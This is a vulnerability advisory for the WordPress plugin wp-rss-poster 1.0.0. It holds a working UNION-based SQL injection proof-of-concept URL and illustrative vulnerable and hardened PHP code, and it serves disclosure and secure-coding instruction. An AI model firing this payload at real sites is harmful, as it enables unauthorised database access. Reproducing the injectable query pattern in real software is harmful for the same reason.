wp-plugin : wp-rss-poster – A1-Injection


Plugin Details


Plugin Name : wp-rss-poster


Affected Version : 1.0.0 (and most probably lower versions, if any)

Vulnerability : A1-Injection
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Unauthenticated


PoC - (Proof of Concept) :


http://localhost/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18

The "id" parameter is the injection point. The root cause is that the plugin places the client-supplied $_GET['id'] directly into its SQL query, with no integer cast, escaping, or $wpdb->prepare() call. The UNION payload above therefore executes as part of the query: it supplies 18 columns to match the vulnerable SELECT, and the values of user(), database() and @@version are returned in columns 2, 3 and 16 and rendered on the page.
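The injectable pattern described above, beside a hardened form, as an added example. This is illustrative code written for this advisory, not code from the wp-rss-poster plugin: the table name wrp_feeds, the column names, and the two function names are assumptions. $wpdb->prepare(), $wpdb->get_row(), absint(), current_user_can() and wp_die() are real WordPress APIs, and the block assumes it runs inside a loaded WordPress environment.

```php
<?php
// Added example, not plugin code. Table and function names are assumed for illustration.

// VULNERABLE: $_GET['id'] is concatenated straight into the SQL string, so a value
// such as "2 union select 1,user(),database(),4,...,@@version,17,18" becomes part of
// the statement and its UNIONed columns are returned to the caller.
function wrp_get_feed_vulnerable() {
    global $wpdb;
    $sql = "SELECT * FROM {$wpdb->prefix}wrp_feeds WHERE id = " . $_GET['id'];
    return $wpdb->get_row( $sql );
}

// HARDENED: require a capability for the admin page, coerce the id to a
// non-negative integer, and bind it through $wpdb->prepare() so the value can
// never alter the shape of the query.
function wrp_get_feed_hardened() {
    global $wpdb;

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }

    // absint() applies abs(intval()): "2 union select ..." becomes 2,
    // purely non-numeric input becomes 0 and is rejected below.
    $id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    if ( 0 === $id ) {
        return null;
    }

    // %d forces an integer placeholder; the column list is explicit rather than
    // SELECT * so the number of returned columns is fixed by the code, not the data.
    $sql = $wpdb->prepare(
        "SELECT id, name, feed_url FROM {$wpdb->prefix}wrp_feeds WHERE id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}
```

Even with the prepared statement in place, the capability check matters: the advisory lists the required access level as Unauthenticated, and a plugin page that can be reached without a privilege check is a problem independent of the query it runs.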


Disclosure Timeline


Vendor Contacted : 2013-12-23

Plugin Status : Closed
Public Disclosure : 2014-05-28
CVE Number : CVE-2014-4938

Plugin Description :
**Main Features:**

1. Easy to create post from multiple rss sources.
2. Specify post categories, author, publish date.
3. Customize formats using flexible post templates.
4. Unix cron and WP internal cron jobs for feed update.
5. Cache images on the WordPress Media Library.
6. Twitter and Facebook support.

**More info:**

* Find out more great [WordPress plugins](http://plugins.wp-coder.net/)
